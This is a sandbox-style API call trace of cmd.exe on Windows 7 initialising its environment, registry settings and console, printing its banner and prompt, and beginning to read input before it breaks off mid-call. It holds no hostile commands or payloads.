GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fd70 | out: lpSystemTimeAsFileTime=0x25fd70*(dwLowDateTime=0xbe4a6540, dwHighDateTime=0x1d5351d)) [0243.575] GetCurrentProcessId () returned 0x5c4 [0243.575] GetCurrentThreadId () returned 0x5c8 [0243.575] GetTickCount () returned 0x7b27 [0243.575] QueryPerformanceCounter (in: lpPerformanceCount=0x25fd78 | out: lpPerformanceCount=0x25fd78*=7523714196) returned 1 [0243.576] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab80000 [0243.576] __set_app_type (_Type=0x1) [0243.577] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aba7810) returned 0x0 [0243.577] __getmainargs (in: _Argc=0x4abca608, _Argv=0x4abca618, _Env=0x4abca610, _DoWildCard=0, _StartInfo=0x4abae0f4 | out: _Argc=0x4abca608, _Argv=0x4abca618, _Env=0x4abca610) returned 0 [0243.578] GetCurrentThreadId () returned 0x5c8 [0243.578] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5c8) returned 0x3c [0243.578] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77010000 [0243.578] GetProcAddress (hModule=0x77010000, lpProcName="SetThreadUILanguage") returned 0x77026d40 [0243.578] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0243.578] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0243.578] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25fd08 | out: phkResult=0x25fd08*=0x0) returned 0x2 [0243.578] VirtualQuery (in: lpAddress=0x25fcf0, lpBuffer=0x25fc70, dwLength=0x30 | out: lpBuffer=0x25fc70*(BaseAddress=0x25f000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0243.578] VirtualQuery (in: lpAddress=0x160000, lpBuffer=0x25fc70, dwLength=0x30 | out: lpBuffer=0x25fc70*(BaseAddress=0x160000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0243.578] VirtualQuery (in: lpAddress=0x161000, lpBuffer=0x25fc70, dwLength=0x30 | out: lpBuffer=0x25fc70*(BaseAddress=0x161000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0243.578] VirtualQuery (in: lpAddress=0x164000, lpBuffer=0x25fc70, dwLength=0x30 | out: lpBuffer=0x25fc70*(BaseAddress=0x164000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0243.578] VirtualQuery (in: lpAddress=0x260000, lpBuffer=0x25fc70, dwLength=0x30 | out: lpBuffer=0x25fc70*(BaseAddress=0x260000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0243.579] GetConsoleOutputCP () returned 0x1b5 [0243.579] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abbbfe0 | out: lpCPInfo=0x4abbbfe0) returned 1 [0243.580] SetConsoleCtrlHandler (HandlerRoutine=0x4aba3184, Add=1) returned 1 [0243.580] _get_osfhandle (_FileHandle=1) returned 0xf4 [0243.580] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0243.580] _get_osfhandle (_FileHandle=1) returned 0xf4 [0243.580] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4abae194 | out: lpMode=0x4abae194) returned 0 [0243.580] _get_osfhandle (_FileHandle=0) returned 0xe8 [0243.580] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4abae198 | out: lpMode=0x4abae198) returned 0 [0243.580] GetEnvironmentStringsW () returned 0x388aa0* [0243.581] GetProcessHeap () returned 0x370000 [0243.581] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xab4) returned 0x389560 [0243.581] FreeEnvironmentStringsW (penv=0x388aa0) returned 1 [0243.581] GetProcessHeap () returned 0x370000 [0243.581] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x8) returned 0x388920 [0243.581] GetEnvironmentStringsW () returned 0x388aa0* [0243.581] GetProcessHeap () returned 0x370000 [0243.581] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xab4) returned 0x38a020 [0243.581] FreeEnvironmentStringsW (penv=0x388aa0) returned 1 [0243.581] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x25ebc8 | out: phkResult=0x25ebc8*=0x44) returned 0x0 [0243.581] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x0, lpData=0x25ebe0*=0x18, lpcbData=0x25ebc4*=0x1000) returned 0x2 [0243.581] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x4, lpData=0x25ebe0*=0x1, lpcbData=0x25ebc4*=0x4) returned 0x0 [0243.581] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x0, lpData=0x25ebe0*=0x1, lpcbData=0x25ebc4*=0x1000) returned 0x2 [0243.581] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x4, lpData=0x25ebe0*=0x0, lpcbData=0x25ebc4*=0x4) returned 0x0 [0243.581] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x4, lpData=0x25ebe0*=0x40, lpcbData=0x25ebc4*=0x4) returned 0x0 [0243.581] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x4, lpData=0x25ebe0*=0x40, lpcbData=0x25ebc4*=0x4) returned 0x0 [0243.581] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x0, lpData=0x25ebe0*=0x40, lpcbData=0x25ebc4*=0x1000) returned 0x2 [0243.581] RegCloseKey (hKey=0x44) returned 0x0 [0243.581] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x25ebc8 | out: phkResult=0x25ebc8*=0x44) returned 0x0 [0243.581] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x0, lpData=0x25ebe0*=0x40, lpcbData=0x25ebc4*=0x1000) returned 0x2 [0243.582] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x4, lpData=0x25ebe0*=0x1, lpcbData=0x25ebc4*=0x4) returned 0x0 [0243.582] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x0, lpData=0x25ebe0*=0x1, lpcbData=0x25ebc4*=0x1000) returned 0x2 [0243.582] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x4, lpData=0x25ebe0*=0x0, lpcbData=0x25ebc4*=0x4) returned 0x0 [0243.582] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x4, lpData=0x25ebe0*=0x9, lpcbData=0x25ebc4*=0x4) returned 0x0 [0243.582] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x4, lpData=0x25ebe0*=0x9, lpcbData=0x25ebc4*=0x4) returned 0x0 [0243.582] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x25ebc0, lpData=0x25ebe0, lpcbData=0x25ebc4*=0x1000 | out: lpType=0x25ebc0*=0x0, lpData=0x25ebe0*=0x9, lpcbData=0x25ebc4*=0x1000) returned 0x2 [0243.582] RegCloseKey (hKey=0x44) returned 0x0 [0243.582] time (in: timer=0x0 | out: timer=0x0) returned 0x5d228392 [0243.582] srand (_Seed=0x5d228392) [0243.582] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0243.582] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0243.583] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abbc0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0243.583] GetProcessHeap () returned 0x370000 [0243.583] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x218) returned 0x38aae0 [0243.583] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x38aaf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0243.583] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0243.583] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0243.583] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0243.583] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0243.583] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0243.583] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0243.583] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0243.583] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0243.583] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0243.583] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0243.583] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0243.583] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0243.583] GetProcessHeap () returned 0x370000 [0243.583] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x389560 | out: hHeap=0x370000) returned 1 [0243.584] GetEnvironmentStringsW () returned 0x388aa0* [0243.584] GetProcessHeap () returned 0x370000 [0243.584] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xacc) returned 0x38ad00 [0243.584] FreeEnvironmentStringsW (penv=0x388aa0) returned 1 [0243.584] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.584] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0243.584] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0243.584] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0243.584] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0243.584] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0243.584] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0243.584] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0243.584] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0243.584] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0243.584] GetProcessHeap () returned 0x370000 [0243.584] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x38) returned 0x3864d0 [0243.584] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x25f9d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0243.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x25f9d0, lpFilePart=0x25f9b0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x25f9b0*="system32") returned 0x13 [0243.584] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0243.584] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x25f6e0 | out: lpFindFileData=0x25f6e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="Windows", cAlternateFileName="")) returned 0x38b7e0 [0243.584] FindClose (in: hFindFile=0x38b7e0 | out: hFindFile=0x38b7e0) returned 1 [0243.584] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x25f6e0 | out: lpFindFileData=0x25f6e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3e382bd0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3e382bd0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="System32", cAlternateFileName="")) returned 0x38b7e0 [0243.585] FindClose (in: hFindFile=0x38b7e0 | out: hFindFile=0x38b7e0) returned 1 [0243.585] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0243.585] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0243.585] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0243.585] GetProcessHeap () returned 0x370000 [0243.585] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38ad00 | out: hHeap=0x370000) returned 1 [0243.585] GetEnvironmentStringsW () returned 0x38ad00* [0243.585] GetProcessHeap () returned 0x370000 [0243.585] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xafc) returned 0x388aa0 [0243.585] FreeEnvironmentStringsW (penv=0x38ad00) returned 1 [0243.585] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abbc0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0243.585] GetProcessHeap () returned 0x370000 [0243.585] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3864d0 | out: hHeap=0x370000) returned 1 [0243.585] GetProcessHeap () returned 0x370000 [0243.585] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4016) returned 0x38ad00 [0243.585] GetProcessHeap () returned 0x370000 [0243.585] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38ad00 | out: hHeap=0x370000) returned 1 [0243.585] GetConsoleOutputCP () returned 0x1b5 [0243.586] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abbbfe0 | out: lpCPInfo=0x4abbbfe0) returned 1 [0243.586] GetUserDefaultLCID () returned 0x409 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4abb7b50, cchData=8 | out: lpLCData=":") returned 2 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x25fae0, cchData=128 | out: lpLCData="0") returned 2 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x25fae0, cchData=128 | out: lpLCData="0") returned 2 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x25fae0, cchData=128 | out: lpLCData="1") returned 2 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4abca740, cchData=8 | out: lpLCData="/") returned 2 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4abca4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4abca460, cchData=32 | out: lpLCData="Tue") returned 4 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4abca420, cchData=32 | out: lpLCData="Wed") returned 4 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4abca3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4abca3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4abca360, cchData=32 | out: lpLCData="Sat") returned 4 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4abca700, cchData=32 | out: lpLCData="Sun") returned 4 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4abb7b40, cchData=8 | out: lpLCData=".") returned 2 [0243.586] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4abca4e0, cchData=8 | out: lpLCData=",") returned 2 [0243.586] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0243.587] GetProcessHeap () returned 0x370000 [0243.587] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20c) returned 0x389620 [0243.587] GetConsoleTitleW (in: lpConsoleTitle=0x389620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.588] _get_osfhandle (_FileHandle=1) returned 0xf4 [0243.588] GetFileType (hFile=0xf4) returned 0x3 [0243.588] BrandingFormatString () returned 0x389840 [0243.592] GetVersion () returned 0x1db10106 [0243.592] _vsnwprintf (in: _Buffer=0x25fc50, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x25fbe8 | out: _Buffer="6.1.7601") returned 8 [0243.592] _get_osfhandle (_FileHandle=1) returned 0xf4 [0243.592] GetFileType (hFile=0xf4) returned 0x3 [0243.592] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4abc6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0244.301] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4abc6340, nSize=0x2000, Arguments=0x25fbf0 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0244.301] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.301] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0244.301] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x25fb78, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25fb78*=0x24, lpOverlapped=0x0) returned 1 [0244.301] _vsnwprintf (in: _Buffer=0x4abc6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x25fc18 | out: _Buffer="\r\n") returned 2 [0244.302] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.302] GetFileType (hFile=0xf4) returned 0x3 [0244.302] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0244.302] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25fbe8, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25fbe8*=0x2, lpOverlapped=0x0) returned 1 [0244.302] _vsnwprintf (in: _Buffer=0x4abc6340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x25fc18 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0244.302] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.302] GetFileType (hFile=0xf4) returned 0x3 [0244.302] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0244.302] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x25fbe8, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25fbe8*=0x3f, lpOverlapped=0x0) returned 1 [0244.302] _vsnwprintf (in: _Buffer=0x4abc6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x25fc18 | out: _Buffer="\r\n") returned 2 [0244.302] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.302] GetFileType (hFile=0xf4) returned 0x3 [0244.302] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0244.302] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25fbe8, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25fbe8*=0x2, lpOverlapped=0x0) returned 1 [0244.302] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77010000 [0244.302] GetProcAddress (hModule=0x77010000, lpProcName="CopyFileExW") returned 0x770223d0 [0244.303] GetProcAddress (hModule=0x77010000, lpProcName="IsDebuggerPresent") returned 0x77018290 [0244.303] GetProcAddress (hModule=0x77010000, lpProcName="SetConsoleInputExeNameW") returned 0x770217e0 [0244.303] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.303] GetFileType (hFile=0xe8) returned 0x3 [0244.303] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0244.303] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x25fa40 | out: TokenHandle=0x25fa40*=0x0) returned 0xc000007c [0244.303] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x25fa40 | out: TokenHandle=0x25fa40*=0x50) returned 0x0 [0244.303] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x25fa50, TokenInformationLength=0x4, ReturnLength=0x25fa58 | out: TokenInformation=0x25fa50, ReturnLength=0x25fa58) returned 0x0 [0244.600] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x25fa58, TokenInformationLength=0x4, ReturnLength=0x25fa50 | out: TokenInformation=0x25fa58, ReturnLength=0x25fa50) returned 0x0 [0244.600] NtClose (Handle=0x50) returned 0x0 [0244.600] GetProcessHeap () returned 0x370000 [0244.600] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38aae0 | out: hHeap=0x370000) returned 1 [0244.803] _vsnwprintf (in: _Buffer=0x4abc6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x25f758 | out: _Buffer="\r\n") returned 2 [0244.803] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.803] GetFileType (hFile=0xf4) returned 0x3 [0244.803] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.803] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0244.803] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25f728, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25f728*=0x2, lpOverlapped=0x0) returned 1 [0244.803] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0244.803] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abbc0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0244.803] _vsnwprintf (in: _Buffer=0x4abaeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x25f768 | out: _Buffer="C:\\Windows\\system32") returned 19 [0244.803] _vsnwprintf (in: _Buffer=0x4abaeb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x25f768 | out: _Buffer=">") returned 1 [0244.803] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.803] GetFileType (hFile=0xf4) returned 0x3 [0244.803] _get_osfhandle (_FileHandle=1) returned 0xf4 [0244.803] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0244.803] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x25f758, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25f758*=0x14, lpOverlapped=0x0) returned 1 [0244.803] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.803] GetFileType (hFile=0xe8) returned 0x3 [0244.803] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.803] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.803] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0244.803] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe320, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0244.804] _get_osfhandle (_FileHandle=0) returned 0xe8 [0244.804] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, 